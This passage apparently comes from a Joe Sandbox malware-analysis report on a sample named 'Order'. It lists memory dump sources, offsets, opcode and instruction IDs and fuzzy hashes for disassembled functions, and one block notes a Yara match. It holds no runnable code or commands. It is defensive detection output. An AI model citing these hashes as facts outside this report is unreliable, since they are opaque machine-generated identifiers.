                                                                                                                                    • Instruction Fuzzy Hash: 3941B0756107029FE725CF28C580E66BBF9FF89314B184A6DE64F87A50E731E845CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: eaaba035d084fff748da6c91ad24471b6644d42a545bba22a73a7428dcd45c78
                                                                                                                                    • Instruction ID: 2f151058037dd4e5f2629e6de798e4a6022ccb47679b73aa24a20e75f3bfd36e
                                                                                                                                    • Opcode Fuzzy Hash: eaaba035d084fff748da6c91ad24471b6644d42a545bba22a73a7428dcd45c78
                                                                                                                                    • Instruction Fuzzy Hash: E141D032940215CFDB21DF68C894BED7BB8FB58B61F484555E419BB391DB34E901CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6c3144a0800e870bf2f309d1118be370488162aa219f147df15a9868e44527ad
                                                                                                                                    • Instruction ID: 01d7c38ce9a61ffb5f9e9a4c56f501db87dd9d123a34dc9a245866bd63fab4ff
                                                                                                                                    • Opcode Fuzzy Hash: 6c3144a0800e870bf2f309d1118be370488162aa219f147df15a9868e44527ad
                                                                                                                                    • Instruction Fuzzy Hash: CD412635E01202DBD729DF88C880F6ABBB5FF99B04F19812AE9099B255C775D842CFD0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 27fe62ea988e74a60e7d08784a3f5c4dcb662e4d7429d368f5a68442113add92
                                                                                                                                    • Instruction ID: 4e00d21c44d01c19354aee2073d260f5def632a6cbe490e873192d2ce5e002af
                                                                                                                                    • Opcode Fuzzy Hash: 27fe62ea988e74a60e7d08784a3f5c4dcb662e4d7429d368f5a68442113add92
                                                                                                                                    • Instruction Fuzzy Hash: 77415C355083069FD712DF69D840E6BB7E9AFC4B94F400A2AF988D7250E734DE058BA3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                    • Instruction ID: 2d1e789b47ff910134c25240f5a4a89f97ef4bc21c3d6b720f6c83c7ef3550ee
                                                                                                                                    • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                    • Instruction Fuzzy Hash: F7416C31A00211DBEF11EE6D9454FBAFB75EBD1752F15806AE98ECB240D63B8D40CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d84ca64e1243c122fcfa992bf42092124b7ec9e20507f3bcf5b1eae3b3f775d9
                                                                                                                                    • Instruction ID: 1116dbb1f0016b422d86ebdc56e6a46fd09f2e7a4e23078aeef6e293e566f4d5
                                                                                                                                    • Opcode Fuzzy Hash: d84ca64e1243c122fcfa992bf42092124b7ec9e20507f3bcf5b1eae3b3f775d9
                                                                                                                                    • Instruction Fuzzy Hash: 20417C71A00601EFD721DF18C840F66BBF8FF94315F288A2AE94D8B251E771E942CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                    • Instruction ID: 7332187869df5ca8641cd566dd274411120a9e7b635226a713f7dfb8271e844d
                                                                                                                                    • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                    • Instruction Fuzzy Hash: F4411871A00605EFDB25CF98C980AAABBF8FF19700F14496DE55ADB691D330EA44CF90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 02542a7fe6f18612bec558f7bf4f28b8b435987bffce82bb6ac041070ef97ac8
                                                                                                                                    • Instruction ID: 09d4d12a1be409000768397c841732d12441b3f559061335aabe81f383f46997
                                                                                                                                    • Opcode Fuzzy Hash: 02542a7fe6f18612bec558f7bf4f28b8b435987bffce82bb6ac041070ef97ac8
                                                                                                                                    • Instruction Fuzzy Hash: 9C41B1B1901701DFCB26EF69E900F69B7F5FF88311F14866AE40E9B2A1DB30A941CB51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4d85b155122263cbfbf840ee9ea955becb129717c7e9b012ebbc34784581888e
                                                                                                                                    • Instruction ID: 668bd8051ecb7627f724b2d6bc36ed698048808c1481b5f91a0a9f2d406a9887
                                                                                                                                    • Opcode Fuzzy Hash: 4d85b155122263cbfbf840ee9ea955becb129717c7e9b012ebbc34784581888e
                                                                                                                                    • Instruction Fuzzy Hash: FE3188B1A00246EFDB52CF98C140B99BBF4FF48725F2085AED109EB291D7369902CF90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c5eaf07a7fe733a15d95791cc992ac232569509e499cf1b549b26628746bf4e8
                                                                                                                                    • Instruction ID: 1a794331c4aaf1c85f25707d008a641a31ed68e29b8dfd49ad3a009e056d4f0d
                                                                                                                                    • Opcode Fuzzy Hash: c5eaf07a7fe733a15d95791cc992ac232569509e499cf1b549b26628746bf4e8
                                                                                                                                    • Instruction Fuzzy Hash: 57418976908301ABD320DF28C845B9BBBE8FF88614F008A2EF59CC7291D7709905CB92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1d01199267e82b2e378222ddcf6a886668ebcd67720e27360b81bcbec5f6bade
                                                                                                                                    • Instruction ID: b5aaad9a4315b958e330ca274717e7d10634f76def7e8eafc4bec322870263f8
                                                                                                                                    • Opcode Fuzzy Hash: 1d01199267e82b2e378222ddcf6a886668ebcd67720e27360b81bcbec5f6bade
                                                                                                                                    • Instruction Fuzzy Hash: C141F471A04616EFDB11DF98C840AA9B7B5FFC4760F108729E81AA7280D734ED418BD0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 601deb05ff41af5c8dd1e961e9c992636072588225558e4ed006a8989aa4ca89
                                                                                                                                    • Instruction ID: a78650d2c665e6501981a88e60072ee0f9aeac3e4fd8851df6324321c353372c
                                                                                                                                    • Opcode Fuzzy Hash: 601deb05ff41af5c8dd1e961e9c992636072588225558e4ed006a8989aa4ca89
                                                                                                                                    • Instruction Fuzzy Hash: AE41C376604752DFD320DF68C940A6AB7E9FFC8B40F18061DF99997680E730E905C7A6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fdf17a58dca4182e4650a499ba322944f1014efec69ff9d7422075ce2833e7d6
                                                                                                                                    • Instruction ID: 8ece338c12cad10595c4a297da9f68b3472a81c59e25ba0b64ccbce6cacbcb64
                                                                                                                                    • Opcode Fuzzy Hash: fdf17a58dca4182e4650a499ba322944f1014efec69ff9d7422075ce2833e7d6
                                                                                                                                    • Instruction Fuzzy Hash: 9C41D1356043028BE729DF28D884F2ABBE9FF80B55F14482DFA498B291DB30D901DB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f2d4ec7157f89a8804b5210efb8018768fc024d7f71181248fc13db2a3284a7f
                                                                                                                                    • Instruction ID: 918674a63e3d15ca9dfdaeb5948635217845417609dc16892df9595a800806ea
                                                                                                                                    • Opcode Fuzzy Hash: f2d4ec7157f89a8804b5210efb8018768fc024d7f71181248fc13db2a3284a7f
                                                                                                                                    • Instruction Fuzzy Hash: 804160B1E01605DFCB15DF69C9809ADBBF5FFD8320F14862AE46AA7260DB34A941CB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 04979dcbbc8ed12027d36b0e6056a8cb2b1d32fafff6efea58819e5abe1a9575
                                                                                                                                    • Instruction ID: cbc3848a2f032deba2f8a5d37d2725668610867b6b4bc20eef8b980bd64e3eeb
                                                                                                                                    • Opcode Fuzzy Hash: 04979dcbbc8ed12027d36b0e6056a8cb2b1d32fafff6efea58819e5abe1a9575
                                                                                                                                    • Instruction Fuzzy Hash: F831BD72A08265DBC313DF79DE859CABBB0FE1135030882AED8148B642D725D04BCBE5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                    • Instruction ID: 94ac595194b2349355a5c4f58365dc4a1515d2598d0f4137ee4f25d7b190090c
                                                                                                                                    • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                    • Instruction Fuzzy Hash: 61312531A04244AFDB52CB68CC44FEBBFE9AF54350F0845A5F85DE7352D2B49984CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e150e00a66a73bde9cf1c224f6ba2d6ec61341648524bb4efcdef456d5b4d2bf
                                                                                                                                    • Instruction ID: 7f44248136aced3ea4fdb036723eaaf0ea17c9b9f7c483c16516458846e52606
                                                                                                                                    • Opcode Fuzzy Hash: e150e00a66a73bde9cf1c224f6ba2d6ec61341648524bb4efcdef456d5b4d2bf
                                                                                                                                    • Instruction Fuzzy Hash: D4319835750756ABD723DF55CC45F6B76F9AF99F50F000028BA08BB291DA64DD00C7A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a7c7b511fe255cc605d2788c459fa17fef67098a23f547cd0e30faf21a8b0d77
                                                                                                                                    • Instruction ID: 7ca65c9674d29158a2ab2b45be665ffebcaddf9cbafa301e4520fd835e5a74cd
                                                                                                                                    • Opcode Fuzzy Hash: a7c7b511fe255cc605d2788c459fa17fef67098a23f547cd0e30faf21a8b0d77
                                                                                                                                    • Instruction Fuzzy Hash: 0A31CF32605201AFC321DF19D880F6AB7F9FB80361F0A446EFA9D9B252D730A905CB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2a15db3bc1d3d7f0ec835ae0afef5097bd2ffbbfbd1e64d3e643388873ba4d08
                                                                                                                                    • Instruction ID: 36555f9cb238e7dcaf05343fc92532e3411e739dc9579feecaa5093db5bddbe8
                                                                                                                                    • Opcode Fuzzy Hash: 2a15db3bc1d3d7f0ec835ae0afef5097bd2ffbbfbd1e64d3e643388873ba4d08
                                                                                                                                    • Instruction Fuzzy Hash: 0C41B171200745DFD726CF28C985FDA7BE9AF85754F058829FA5D8B250D770E844CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0b6f8258533bdfd1b38aae01638bf7f015bed783863309980cde1f96fd0ddcd5
                                                                                                                                    • Instruction ID: e90ab9cdf5ca85cb761cda2ce8859ba4cc7897ee1d682115b2f9d359ce0e72b7
                                                                                                                                    • Opcode Fuzzy Hash: 0b6f8258533bdfd1b38aae01638bf7f015bed783863309980cde1f96fd0ddcd5
                                                                                                                                    • Instruction Fuzzy Hash: 16317071A04201AFD720DF29C880F6BB7E5FB84714F05496DFA5D9B251E730E905CB51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 22daeb157ddef898588f5aa86c6cc945e269e12ac12f71cb431f2809365d9b6e
                                                                                                                                    • Instruction ID: 404e822138c4cc84775e9c1cce1db89c73a593cebf2c3e311100744bdfb0163d
                                                                                                                                    • Opcode Fuzzy Hash: 22daeb157ddef898588f5aa86c6cc945e269e12ac12f71cb431f2809365d9b6e
                                                                                                                                    • Instruction Fuzzy Hash: D431D8316016D29BF322975ECE88FE57BDCBF40781F1D00A4AE4E976D1DB28D940C225
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 657c0f1e5f1e62ff77837d0b0464d1c1a4c0605f697e8af6a6ce063ebbf2f36e
                                                                                                                                    • Instruction ID: 35e1bd35047928ce7a536cbeebc7e02baec7d1e3c045575421667f6a52588f03
                                                                                                                                    • Opcode Fuzzy Hash: 657c0f1e5f1e62ff77837d0b0464d1c1a4c0605f697e8af6a6ce063ebbf2f36e
                                                                                                                                    • Instruction Fuzzy Hash: 5B31E175E0021AABDB16DF98CC40BAEB7B5FB48B44F454168E908AB284D770ED11CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 01a871d8b0f8ce1b4eddb7df9b2a0371dd6dd4dbe34cd5526f261c2bd0c9007b
                                                                                                                                    • Instruction ID: 1ed6ae5a6b066d090a323cbc670fd6dba829be1b000f73d15e6dd4efe0102ac3
                                                                                                                                    • Opcode Fuzzy Hash: 01a871d8b0f8ce1b4eddb7df9b2a0371dd6dd4dbe34cd5526f261c2bd0c9007b
                                                                                                                                    • Instruction Fuzzy Hash: 85313376A4012DABCB22DF54DC88BDE7BF9AB98750F1501A5E90CE7250DA30DE918F90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 36d061cf6bc13680e4759dfdb6afecb3cd6b86de42529cbf3208199f60a55788
                                                                                                                                    • Instruction ID: 9ef889b616d4f3ee1a972eab07621f2d4005ac69c0e70d98c950b7b3e23d5b4b
                                                                                                                                    • Opcode Fuzzy Hash: 36d061cf6bc13680e4759dfdb6afecb3cd6b86de42529cbf3208199f60a55788
                                                                                                                                    • Instruction Fuzzy Hash: C831A476E10619AFDB21DEBAC840EAEBBBCEF44750F014465E919E7250D7709A008BE0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 313d6f5028fbf21de2172e9f29467766f896d27111b77c1e26782bf9275a9ca6
                                                                                                                                    • Instruction ID: f275e1377bfa12d45d76f081023f1a2127040395006ffb01787a85b27bf0ac03
                                                                                                                                    • Opcode Fuzzy Hash: 313d6f5028fbf21de2172e9f29467766f896d27111b77c1e26782bf9275a9ca6
                                                                                                                                    • Instruction Fuzzy Hash: EC31C271B40706ABDB13DF99DC50B6AB7B9AF88758F044069F509EB382DA70DD118B90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fb0d694cabc143e4fd6970c91a75172dfd4f38fc9215e99da0012a664c440d8e
                                                                                                                                    • Instruction ID: e70a417052b3136ce08d2c5024dd570a5f08a56f07fe4a6043691843fe68bda9
                                                                                                                                    • Opcode Fuzzy Hash: fb0d694cabc143e4fd6970c91a75172dfd4f38fc9215e99da0012a664c440d8e
                                                                                                                                    • Instruction Fuzzy Hash: D231F932E04756DBD712DE28C940EABBBA5AFD4250F094929FE5D97310EA31DC0187E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9eae08bbddf009c4c8cb432230bb14de3da52177352f6232548521054853d315
                                                                                                                                    • Instruction ID: cfb2e2e8b630a60da523afa1beda8bcbb14e47a74bfe6c8426e97a103f4ec93e
                                                                                                                                    • Opcode Fuzzy Hash: 9eae08bbddf009c4c8cb432230bb14de3da52177352f6232548521054853d315
                                                                                                                                    • Instruction Fuzzy Hash: D1319A716093119FE360CF59C840F2BBBE9FB98700F454AAEE98897251D770E848CBD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                    • Instruction ID: ff6c8be06c6a3abe2f7983f0f15838efdb049593b64cc08b6e4f38c19306cecf
                                                                                                                                    • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                    • Instruction Fuzzy Hash: 8031FAB2B00701AFD765CF6DDE81B5ABBF8AF48650F18492DA59EC3651E630F9008B64
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7928ad133854f2515a789302c029ef44d3c646d4dd92cb6d75b2f799a05ab30e
                                                                                                                                    • Instruction ID: 54e144083ae77384c006709d430283cf637286df75f064cb7d64bf3e8f632277
                                                                                                                                    • Opcode Fuzzy Hash: 7928ad133854f2515a789302c029ef44d3c646d4dd92cb6d75b2f799a05ab30e
                                                                                                                                    • Instruction Fuzzy Hash: FE319871909301DFCB12DF19C548A5ABBF5FF89614F0449AEF88C9B311D3309A55CB92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf579d898f6d303d5ccac84bf681bf9ae362241e9fe8762db0c60a61adc5edc3
                                                                                                                                    • Instruction ID: 1936f65c4f3639cd9b544d84b914ae6190de374805dfccb5676236b4316b348d
                                                                                                                                    • Opcode Fuzzy Hash: cf579d898f6d303d5ccac84bf681bf9ae362241e9fe8762db0c60a61adc5edc3
                                                                                                                                    • Instruction Fuzzy Hash: 5431D431B002069FD724EFE9C981B6EBBFDAB84744F008529D54ED7654D730E945CBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                    • Instruction ID: 0efcfdbd713582e9085e839f5c6f5658e54fca74d2e49f47875dce5d7337a8a9
                                                                                                                                    • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                    • Instruction Fuzzy Hash: 3E212832E0065BAADB11DBB9C801BAFBBB9EF94740F0584369E19F7340E270D900C7A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 432a8434d2111bfd205b0055fb98e4eb5701849cd4fcbb2734f73b82dd4c0284
                                                                                                                                    • Instruction ID: 552c61d352854a097bb246fa0584c02fecbeb66aeba95273c5e9a465375e833e
                                                                                                                                    • Opcode Fuzzy Hash: 432a8434d2111bfd205b0055fb98e4eb5701849cd4fcbb2734f73b82dd4c0284
                                                                                                                                    • Instruction Fuzzy Hash: 45313BB55002019BDB21EF6CCC81B7977F8EF91314F548169ED4D9B382EA34D986CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
